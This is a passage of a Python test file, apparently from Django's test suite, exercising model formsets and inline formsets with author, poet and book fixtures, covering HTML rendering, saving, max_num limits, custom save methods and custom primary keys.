# Gah! We forgot Paul Verlaine. Let's create a formset to edit the
# existing authors with an extra form to add him. We *could* pass in a
# queryset to restrict the Author objects we edit, but in this case
# we'll use it to display them in alphabetical order by name.
qs = Author.objects.order_by('name')
AuthorFormSet = modelformset_factory(Author, extra=1, can_delete=False)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" value="Arthur Rimbaud" maxlength="100" /><input type="hidden" name="form-0-id" value="%d" id="id_form-0-id" /></p>' % author2.id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" value="Charles Baudelaire" maxlength="100" /><input type="hidden" name="form-1-id" value="%d" id="id_form-1-id" /></p>' % author1.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_form-2-name">Name:</label> <input id="id_form-2-name" type="text" name="form-2-name" maxlength="100" /><input type="hidden" name="form-2-id" id="id_form-2-id" /></p>')
data = {
'form-TOTAL_FORMS': '3', # the number of forms rendered
'form-INITIAL_FORMS': '2', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(author2.id),
'form-0-name': 'Arthur Rimbaud',
'form-1-id': str(author1.id),
'form-1-name': 'Charles Baudelaire',
'form-2-name': 'Paul Verlaine',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
# Only changed or new objects are returned from formset.save()
saved = formset.save()
self.assertEqual(len(saved), 1)
author3 = saved[0]
self.assertEqual(author3, Author.objects.get(name='Paul Verlaine'))
authors = list(Author.objects.order_by('name'))
self.assertEqual(authors, [author2, author1, author3])
# This probably shouldn't happen, but it will. If an add form was
# marked for deletion, make sure we don't save that form.
qs = Author.objects.order_by('name')
AuthorFormSet = modelformset_factory(Author, extra=1, can_delete=True)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 4)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" value="Arthur Rimbaud" maxlength="100" /></p>\n'
'<p><label for="id_form-0-DELETE">Delete:</label> <input type="checkbox" name="form-0-DELETE" id="id_form-0-DELETE" /><input type="hidden" name="form-0-id" value="%d" id="id_form-0-id" /></p>' % author2.id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" value="Charles Baudelaire" maxlength="100" /></p>\n'
'<p><label for="id_form-1-DELETE">Delete:</label> <input type="checkbox" name="form-1-DELETE" id="id_form-1-DELETE" /><input type="hidden" name="form-1-id" value="%d" id="id_form-1-id" /></p>' % author1.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_form-2-name">Name:</label> <input id="id_form-2-name" type="text" name="form-2-name" value="Paul Verlaine" maxlength="100" /></p>\n'
'<p><label for="id_form-2-DELETE">Delete:</label> <input type="checkbox" name="form-2-DELETE" id="id_form-2-DELETE" /><input type="hidden" name="form-2-id" value="%d" id="id_form-2-id" /></p>' % author3.id)
self.assertHTMLEqual(formset.forms[3].as_p(),
'<p><label for="id_form-3-name">Name:</label> <input id="id_form-3-name" type="text" name="form-3-name" maxlength="100" /></p>\n'
'<p><label for="id_form-3-DELETE">Delete:</label> <input type="checkbox" name="form-3-DELETE" id="id_form-3-DELETE" /><input type="hidden" name="form-3-id" id="id_form-3-id" /></p>')
data = {
'form-TOTAL_FORMS': '4', # the number of forms rendered
'form-INITIAL_FORMS': '3', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(author2.id),
'form-0-name': 'Arthur Rimbaud',
'form-1-id': str(author1.id),
'form-1-name': 'Charles Baudelaire',
'form-2-id': str(author3.id),
'form-2-name': 'Paul Verlaine',
'form-3-name': 'Walt Whitman',
'form-3-DELETE': 'on',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
# No objects were changed or saved so nothing will come back.
self.assertEqual(formset.save(), [])
authors = list(Author.objects.order_by('name'))
self.assertEqual(authors, [author2, author1, author3])
# Let's edit a record to ensure save only returns that one record.
data = {
'form-TOTAL_FORMS': '4', # the number of forms rendered
'form-INITIAL_FORMS': '3', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(author2.id),
'form-0-name': 'Walt Whitman',
'form-1-id': str(author1.id),
'form-1-name': 'Charles Baudelaire',
'form-2-id': str(author3.id),
'form-2-name': 'Paul Verlaine',
'form-3-name': '',
'form-3-DELETE': '',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
# One record has changed.
saved = formset.save()
self.assertEqual(len(saved), 1)
self.assertEqual(saved[0], Author.objects.get(name='Walt Whitman'))
def test_commit_false(self):
# Test the behavior of commit=False and save_m2m
author1 = Author.objects.create(name='Charles Baudelaire')
author2 = Author.objects.create(name='Paul Verlaine')
author3 = Author.objects.create(name='Walt Whitman')
meeting = AuthorMeeting.objects.create(created=date.today())
meeting.authors = Author.objects.all()
# create an Author instance to add to the meeting.
author4 = Author.objects.create(name='John Steinbeck')
AuthorMeetingFormSet = modelformset_factory(AuthorMeeting, extra=1, can_delete=True)
data = {
'form-TOTAL_FORMS': '2', # the number of forms rendered
'form-INITIAL_FORMS': '1', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(meeting.id),
'form-0-name': '2nd Tuesday of the Week Meeting',
'form-0-authors': [author2.id, author1.id, author3.id, author4.id],
'form-1-name': '',
'form-1-authors': '',
'form-1-DELETE': '',
}
formset = AuthorMeetingFormSet(data=data, queryset=AuthorMeeting.objects.all())
self.assertTrue(formset.is_valid())
instances = formset.save(commit=False)
for instance in instances:
instance.created = date.today()
instance.save()
formset.save_m2m()
self.assertQuerysetEqual(instances[0].authors.all(), [
'<Author: Charles Baudelaire>',
'<Author: John Steinbeck>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
def test_max_num(self):
# Test the behavior of max_num with model formsets. It should allow
# all existing related objects/inlines for a given object to be
# displayed, but not allow the creation of new inlines beyond max_num.
author1 = Author.objects.create(name='Charles Baudelaire')
author2 = Author.objects.create(name='Paul Verlaine')
author3 = Author.objects.create(name='Walt Whitman')
qs = Author.objects.order_by('name')
AuthorFormSet = modelformset_factory(Author, max_num=None, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 6)
self.assertEqual(len(formset.extra_forms), 3)
AuthorFormSet = modelformset_factory(Author, max_num=4, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 4)
self.assertEqual(len(formset.extra_forms), 1)
AuthorFormSet = modelformset_factory(Author, max_num=0, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 3)
self.assertEqual(len(formset.extra_forms), 0)
AuthorFormSet = modelformset_factory(Author, max_num=None)
formset = AuthorFormSet(queryset=qs)
self.assertQuerysetEqual(formset.get_queryset(), [
'<Author: Charles Baudelaire>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
AuthorFormSet = modelformset_factory(Author, max_num=0)
formset = AuthorFormSet(queryset=qs)
self.assertQuerysetEqual(formset.get_queryset(), [
'<Author: Charles Baudelaire>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
AuthorFormSet = modelformset_factory(Author, max_num=4)
formset = AuthorFormSet(queryset=qs)
self.assertQuerysetEqual(formset.get_queryset(), [
'<Author: Charles Baudelaire>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
def test_custom_save_method(self):
class PoetForm(forms.ModelForm):
def save(self, commit=True):
# change the name to "Vladimir Mayakovsky" just to be a jerk.
author = super(PoetForm, self).save(commit=False)
author.name = "Vladimir Mayakovsky"
if commit:
author.save()
return author
PoetFormSet = modelformset_factory(Poet, form=PoetForm)
data = {
'form-TOTAL_FORMS': '3', # the number of forms rendered
'form-INITIAL_FORMS': '0', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-name': 'Walt Whitman',
'form-1-name': 'Charles Baudelaire',
'form-2-name': '',
}
qs = Poet.objects.all()
formset = PoetFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
poets = formset.save()
self.assertEqual(len(poets), 2)
poet1, poet2 = poets
self.assertEqual(poet1.name, 'Vladimir Mayakovsky')
self.assertEqual(poet2.name, 'Vladimir Mayakovsky')
def test_custom_form(self):
""" Test that model_formset respects fields and exclude parameters of
custom form
"""
class PostForm1(forms.ModelForm):
class Meta:
model = Post
fields = ('title', 'posted')
class PostForm2(forms.ModelForm):
class Meta:
model = Post
exclude = ('subtitle',)
PostFormSet = modelformset_factory(Post, form=PostForm1)
formset = PostFormSet()
self.assertFalse("subtitle" in formset.forms[0].fields)
PostFormSet = modelformset_factory(Post, form=PostForm2)
formset = PostFormSet()
self.assertFalse("subtitle" in formset.forms[0].fields)
def test_model_inheritance(self):
BetterAuthorFormSet = modelformset_factory(BetterAuthor)
formset = BetterAuthorFormSet()
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" maxlength="100" /></p>\n'
'<p><label for="id_form-0-write_speed">Write speed:</label> <input type="text" name="form-0-write_speed" id="id_form-0-write_speed" /><input type="hidden" name="form-0-author_ptr" id="id_form-0-author_ptr" /></p>')
data = {
'form-TOTAL_FORMS': '1', # the number of forms rendered
'form-INITIAL_FORMS': '0', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-author_ptr': '',
'form-0-name': 'Ernest Hemingway',
'form-0-write_speed': '10',
}
formset = BetterAuthorFormSet(data)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
author1, = saved
self.assertEqual(author1, BetterAuthor.objects.get(name='Ernest Hemingway'))
hemingway_id = BetterAuthor.objects.get(name="Ernest Hemingway").pk
formset = BetterAuthorFormSet()
self.assertEqual(len(formset.forms), 2)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" value="Ernest Hemingway" maxlength="100" /></p>\n'
'<p><label for="id_form-0-write_speed">Write speed:</label> <input type="text" name="form-0-write_speed" value="10" id="id_form-0-write_speed" /><input type="hidden" name="form-0-author_ptr" value="%d" id="id_form-0-author_ptr" /></p>' % hemingway_id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" maxlength="100" /></p>\n'
'<p><label for="id_form-1-write_speed">Write speed:</label> <input type="text" name="form-1-write_speed" id="id_form-1-write_speed" /><input type="hidden" name="form-1-author_ptr" id="id_form-1-author_ptr" /></p>')
data = {
'form-TOTAL_FORMS': '2', # the number of forms rendered
'form-INITIAL_FORMS': '1', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-author_ptr': hemingway_id,
'form-0-name': 'Ernest Hemingway',
'form-0-write_speed': '10',
'form-1-author_ptr': '',
'form-1-name': '',
'form-1-write_speed': '',
}
formset = BetterAuthorFormSet(data)
self.assertTrue(formset.is_valid())
self.assertEqual(formset.save(), [])
def test_inline_formsets(self):
# We can also create a formset that is tied to a parent model. This is
# how the admin system's edit inline functionality works.
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=3)
author = Author.objects.create(name='Charles Baudelaire')
formset = AuthorBooksFormSet(instance=author)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" maxlength="100" /><input type="hidden" name="book_set-0-author" value="%d" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" id="id_book_set-0-id" /></p>' % author.id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" maxlength="100" /><input type="hidden" name="book_set-1-author" value="%d" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" id="id_book_set-1-id" /></p>' % author.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" maxlength="100" /><input type="hidden" name="book_set-2-author" value="%d" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" id="id_book_set-2-id" /></p>' % author.id)
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '0', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-title': 'Les Fleurs du Mal',
'book_set-1-title': '',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book1, = saved
self.assertEqual(book1, Book.objects.get(title='Les Fleurs du Mal'))
self.assertQuerysetEqual(author.book_set.all(), ['<Book: Les Fleurs du Mal>'])
# Now that we've added a book to Charles Baudelaire, let's try adding
# another one. This time though, an edit form will be available for
# every existing book.
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=2)
author = Author.objects.get(name='Charles Baudelaire')
formset = AuthorBooksFormSet(instance=author)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" value="Les Fleurs du Mal" maxlength="100" /><input type="hidden" name="book_set-0-author" value="%d" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" value="%d" id="id_book_set-0-id" /></p>' % (author.id, book1.id))
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" maxlength="100" /><input type="hidden" name="book_set-1-author" value="%d" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" id="id_book_set-1-id" /></p>' % author.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" maxlength="100" /><input type="hidden" name="book_set-2-author" value="%d" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" id="id_book_set-2-id" /></p>' % author.id)
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '1', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': str(book1.id),
'book_set-0-title': 'Les Fleurs du Mal',
'book_set-1-title': 'Les Paradis Artificiels',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book2, = saved
self.assertEqual(book2, Book.objects.get(title='Les Paradis Artificiels'))
# As you can see, 'Les Paradis Artificiels' is now a book belonging to
# Charles Baudelaire.
self.assertQuerysetEqual(author.book_set.order_by('title'), [
'<Book: Les Fleurs du Mal>',
'<Book: Les Paradis Artificiels>',
])
def test_inline_formsets_save_as_new(self):
# The save_as_new parameter lets you re-associate the data to a new
# instance. This is used in the admin for save_as functionality.
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=2)
author = Author.objects.create(name='Charles Baudelaire')
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '2', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': '1',
'book_set-0-title': 'Les Fleurs du Mal',
'book_set-1-id': '2',
'book_set-1-title': 'Les Paradis Artificiels',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=Author(), save_as_new=True)
self.assertTrue(formset.is_valid())
new_author = Author.objects.create(name='Charles Baudelaire')
formset = AuthorBooksFormSet(data, instance=new_author, save_as_new=True)
saved = formset.save()
self.assertEqual(len(saved), 2)
book1, book2 = saved
self.assertEqual(book1.title, 'Les Fleurs du Mal')
self.assertEqual(book2.title, 'Les Paradis Artificiels')
# Test using a custom prefix on an inline formset.
formset = AuthorBooksFormSet(prefix="test")
self.assertEqual(len(formset.forms), 2)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_test-0-title">Title:</label> <input id="id_test-0-title" type="text" name="test-0-title" maxlength="100" /><input type="hidden" name="test-0-author" id="id_test-0-author" /><input type="hidden" name="test-0-id" id="id_test-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_test-1-title">Title:</label> <input id="id_test-1-title" type="text" name="test-1-title" maxlength="100" /><input type="hidden" name="test-1-author" id="id_test-1-author" /><input type="hidden" name="test-1-id" id="id_test-1-id" /></p>')
def test_inline_formsets_with_custom_pk(self):
# Test inline formsets where the inline-edited object has a custom
# primary key that is not the fk to the parent object.
AuthorBooksFormSet2 = inlineformset_factory(Author, BookWithCustomPK, can_delete=False, extra=1)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
formset = AuthorBooksFormSet2(instance=author)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_bookwithcustompk_set-0-my_pk">My pk:</label> <input type="text" name="bookwithcustompk_set-0-my_pk" id="id_bookwithcustompk_set-0-my_pk" /></p>\n'
'<p><label for="id_bookwithcustompk_set-0-title">Title:</label> <input id="id_bookwithcustompk_set-0-title" type="text" name="bookwithcustompk_set-0-title" maxlength="100" /><input type="hidden" name="bookwithcustompk_set-0-author" value="1" id="id_bookwithcustompk_set-0-author" /></p>')
data = {
'bookwithcustompk_set-TOTAL_FORMS': '1', # the number of forms rendered
'bookwithcustompk_set-INITIAL_FORMS': '0', # the number of forms with initial data
'bookwithcustompk_set-MAX_NUM_FORMS': '', # the max number of forms
'bookwithcustompk_set-0-my_pk': '77777',
'bookwithcustompk_set-0-title': 'Les Fleurs du Mal',
}
formset = AuthorBooksFormSet2(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book1, = saved
self.assertEqual(book1.pk, 77777)
book1 = author.bookwithcustompk_set.get()
self.assertEqual(book1.title, 'Les Fleurs du Mal')
def test_inline_formsets_with_multi_table_inheritance(self):
# Test inline formsets where the inline-edited object uses multi-table
# inheritance, thus has a non AutoField yet auto-created primary key.
AuthorBooksFormSet3 = inlineformset_factory(Author, AlternateBook, can_delete=False, extra=1)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
formset = AuthorBooksFormSet3(instance=author)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_alternatebook_set-0-title">Title:</label> <input id="id_alternatebook_set-0-title" type="text" name="alternatebook_set-0-title" maxlength="100" /></p>\n'
'<p><label for="id_alternatebook_set-0-notes">Notes:</label> <input id="id_alternatebook_set-0-notes" type="text" name="alternatebook_set-0-notes" maxlength="100" /><input type="hidden" name="alternatebook_set-0-author" value="1" id="id_alternatebook_set-0-author" /><input type="hidden" name="alternatebook_set-0-book_ptr" id="id_alternatebook_set-0-book_ptr" /></p>')
data = {
'alternatebook_set-TOTAL_FORMS': '1', # the number of forms rendered
'alternatebook_set-INITIAL_FORMS': '0', # the number of forms with initial data
'alternatebook_set-MAX_NUM_FORMS': '', # the max number of forms
'alternatebook_set-0-title': 'Flowers of Evil',
'alternatebook_set-0-notes': 'English translation of Les Fleurs du Mal'
}
formset = AuthorBooksFormSet3(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
book1, = saved
self.assertEqual(book1.title, 'Flowers of Evil')
self.assertEqual(book1.notes, 'English translation of Les Fleurs du Mal')
@skipUnlessDBFeature('ignores_nulls_in_unique_constraints')
def test_inline_formsets_with_nullable_unique_together(self):
# Test inline formsets where the inline-edited object has a
# unique_together constraint with a nullable member
AuthorBooksFormSet4 = inlineformset_factory(Author, BookWithOptionalAltEditor, can_delete=False, extra=2)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
data = {
'bookwithoptionalalteditor_set-TOTAL_FORMS': '2', # the number of forms rendered
'bookwithoptionalalteditor_set-INITIAL_FORMS': '0', # the number of forms with initial data
'bookwithoptionalalteditor_set-MAX_NUM_FORMS': '', # the max number of forms
'bookwithoptionalalteditor_set-0-author': '1',
'bookwithoptionalalteditor_set-0-title': 'Les Fleurs du Mal',
'bookwithoptionalalteditor_set-1-author': '1',
'bookwithoptionalalteditor_set-1-title': 'Les Fleurs du Mal',
}
formset = AuthorBooksFormSet4(data, instance=author)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 2)
book1, book2 = saved
self.assertEqual(book1.author_id, 1)
self.assertEqual(book1.title, 'Les Fleurs du Mal')
self.assertEqual(book2.author_id, 1)
self.assertEqual(book2.title, 'Les Fleurs du Mal')
def test_inline_formsets_with_custom_save_method(self):
AuthorBooksFormSet = inlineformset_factory(Author, Book, can_delete=False, extra=2)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
book1 = Book.objects.create(pk=1, author=author, title='Les Paradis Artificiels')
book2 = Book.objects.create(pk=2, author=author, title='Les Fleurs du Mal')
book3 = Book.objects.create(pk=3, author=author, title='Flowers of Evil')
class PoemForm(forms.ModelForm):
def save(self, commit=True):
# change the name to "Brooklyn Bridge" just to be a jerk.
poem = super(PoemForm, self).save(commit=False)
poem.name = "Brooklyn Bridge"
if commit:
poem.save()
return poem
PoemFormSet = inlineformset_factory(Poet, Poem, form=PoemForm)
data = {
'poem_set-TOTAL_FORMS': '3', # the number of forms rendered
'poem_set-INITIAL_FORMS': '0', # the number of forms with initial data
'poem_set-MAX_NUM_FORMS': '', # the max number of forms
'poem_set-0-name': 'The Cloud in Trousers',
'poem_set-1-name': 'I',
'poem_set-2-name': '',
}
poet = Poet.objects.create(name='Vladimir Mayakovsky')
formset = PoemFormSet(data=data, instance=poet)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 2)
poem1, poem2 = saved
self.assertEqual(poem1.name, 'Brooklyn Bridge')
self.assertEqual(poem2.name, 'Brooklyn Bridge')
# We can provide a custom queryset to our InlineFormSet:
custom_qs = Book.objects.order_by('-title')
formset = AuthorBooksFormSet(instance=author, queryset=custom_qs)
self.assertEqual(len(formset.forms), 5)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" value="Les Paradis Artificiels" maxlength="100" /><input type="hidden" name="book_set-0-author" value="1" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" value="1" id="id_book_set-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" value="Les Fleurs du Mal" maxlength="100" /><input type="hidden" name="book_set-1-author" value="1" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" value="2" id="id_book_set-1-id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" value="Flowers of Evil" maxlength="100" /><input type="hidden" name="book_set-2-author" value="1" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" value="3" id="id_book_set-2-id" /></p>')
self.assertHTMLEqual(formset.forms[3].as_p(),
'<p><label for="id_book_set-3-title">Title:</label> <input id="id_book_set-3-title" type="text" name="book_set-3-title" maxlength="100" /><input type="hidden" name="book_set-3-author" value="1" id="id_book_set-3-author" /><input type="hidden" name="book_set-3-id" id="id_book_set-3-id" /></p>')
self.assertHTMLEqual(formset.forms[4].as_p(),
'<p><label for="id_book_set-4-title">Title:</label> <input id="id_book_set-4-title" type="text" name="book_set-4-title" maxlength="100" /><input type="hidden" name="book_set-4-author" value="1" id="id_book_set-4-author" /><input type="hidden" name="book_set-4-id" id="id_book_set-4-id" /></p>')
data = {
'book_set-TOTAL_FORMS': '5', # the number of forms rendered
'book_set-INITIAL_FORMS': '3', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': str(book1.id),
'book_set-0-title': 'Les Paradis Artificiels',
'book_set-1-id': str(book2.id),
'book_set-1-title': 'Les Fleurs du Mal',
'book_set-2-id': str(book3.id),
'book_set-2-title': 'Flowers of Evil',
'book_set-3-title': 'Revue des deux mondes',
'book_set-4-title': '',
}
formset = AuthorBooksFormSet(data, instance=author, queryset=custom_qs)
self.assertTrue(formset.is_valid())
custom_qs = Book.objects.filter(title__startswith='F')
formset = AuthorBooksFormSet(instance=author, queryset=custom_qs)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_book_set-0-title">Title:</label> <input id="id_book_set-0-title" type="text" name="book_set-0-title" value="Flowers of Evil" maxlength="100" /><input type="hidden" name="book_set-0-author" value="1" id="id_book_set-0-author" /><input type="hidden" name="book_set-0-id" value="3" id="id_book_set-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_book_set-1-title">Title:</label> <input id="id_book_set-1-title" type="text" name="book_set-1-title" maxlength="100" /><input type="hidden" name="book_set-1-author" value="1" id="id_book_set-1-author" /><input type="hidden" name="book_set-1-id" id="id_book_set-1-id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_book_set-2-title">Title:</label> <input id="id_book_set-2-title" type="text" name="book_set-2-title" maxlength="100" /><input type="hidden" name="book_set-2-author" value="1" id="id_book_set-2-author" /><input type="hidden" name="book_set-2-id" id="id_book_set-2-id" /></p>')
data = {
'book_set-TOTAL_FORMS': '3', # the number of forms rendered
'book_set-INITIAL_FORMS': '1', # the number of forms with initial data
'book_set-MAX_NUM_FORMS': '', # the max number of forms
'book_set-0-id': str(book3.id),
'book_set-0-title': 'Flowers of Evil',
'book_set-1-title': 'Revue des deux mondes',
'book_set-2-title': '',
}
formset = AuthorBooksFormSet(data, instance=author, queryset=custom_qs)
self.assertTrue(formset.is_valid())
def test_custom_pk(self):
        # Ensure the custom primary key is rendered in the form so it can be filled in.
CustomPrimaryKeyFormSet = modelformset_factory(CustomPrimaryKey)
formset = CustomPrimaryKeyFormSet()
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-my_pk">My pk:</label> <input id="id_form-0-my_pk" type="text" name="form-0-my_pk" maxlength="10" /></p>\n'
'<p><label for="id_form-0-some_field">Some field:</label> <input id="id_form-0-some_field" type="text" name="form-0-some_field" maxlength="100" /></p>')
# Custom primary keys with ForeignKey, OneToOneField and AutoField ############
place = Place.objects.create(pk=1, name='Giordanos', city='Chicago')
FormSet = inlineformset_factory(Place, Owner, extra=2, can_delete=False)
formset = FormSet(instance=place)
self.assertEqual(len(formset.forms), 2)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_owner_set-0-name">Name:</label> <input id="id_owner_set-0-name" type="text" name="owner_set-0-name" maxlength="100" /><input type="hidden" name="owner_set-0-place" value="1" id="id_owner_set-0-place" /><input type="hidden" name="owner_set-0-auto_id" id="id_owner_set-0-auto_id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_owner_set-1-name">Name:</label> <input id="id_owner_set-1-name" type="text" name="owner_set-1-name" maxlength="100" /><input type="hidden" name="owner_set-1-place" value="1" id="id_owner_set-1-place" /><input type="hidden" name="owner_set-1-auto_id" id="id_owner_set-1-auto_id" /></p>')
data = {
'owner_set-TOTAL_FORMS': '2',
'owner_set-INITIAL_FORMS': '0',
'owner_set-MAX_NUM_FORMS': '',
'owner_set-0-auto_id': '',
'owner_set-0-name': 'Joe Perry',
'owner_set-1-auto_id': '',
'owner_set-1-name': '',
}
formset = FormSet(data, instance=place)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
owner1, = saved
self.assertEqual(owner1.name, 'Joe Perry')
self.assertEqual(owner1.place.name, 'Giordanos')
formset = FormSet(instance=place)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_owner_set-0-name">Name:</label> <input id="id_owner_set-0-name" type="text" name="owner_set-0-name" value="Joe Perry" maxlength="100" /><input type="hidden" name="owner_set-0-place" value="1" id="id_owner_set-0-place" /><input type="hidden" name="owner_set-0-auto_id" value="%d" id="id_owner_set-0-auto_id" /></p>'
% owner1.auto_id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_owner_set-1-name">Name:</label> <input id="id_owner_set-1-name" type="text" name="owner_set-1-name" maxlength="100" /><input type="hidden" name="owner_set-1-place" value="1" id="id_owner_set-1-place" /><input type="hidden" name="owner_set-1-auto_id" id="id_owner_set-1-auto_id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_owner_set-2-name">Name:</label> <input id="id_owner_set-2-name" type="text" name="owner_set-2-name" maxlength="100" /><input type="hidden" name="owner_set-2-place" value="1" id="id_owner_set-2-place" /><input type="hidden" name="owner_set-2-auto_id" id="id_owner_set-2-auto_id" /></p>')
data = {
'owner_set-TOTAL_FORMS': '3',
'owner_set-INITIAL_FORMS': '1',
'owner_set-MAX_NUM_FORMS': '',
'owner_set-0-auto_id': six.text_type(owner1.auto_id),
